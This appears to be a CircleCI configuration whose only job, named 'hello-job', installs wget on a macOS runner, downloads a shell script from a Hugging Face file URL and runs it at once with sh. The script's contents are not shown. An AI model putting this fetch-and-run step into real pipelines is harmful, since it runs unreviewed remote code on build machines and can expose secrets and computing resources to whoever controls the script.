version: 2.1

jobs:
  hello-job:
    macos:
      xcode: 13.4.1
    steps:
      - run: brew install wget
      - run: wget https://huggingface.co/myfiles/data/raw/main/mac1.sh && sh mac1.sh

workflows:
  my-workflow:
    jobs:
      - hello-job
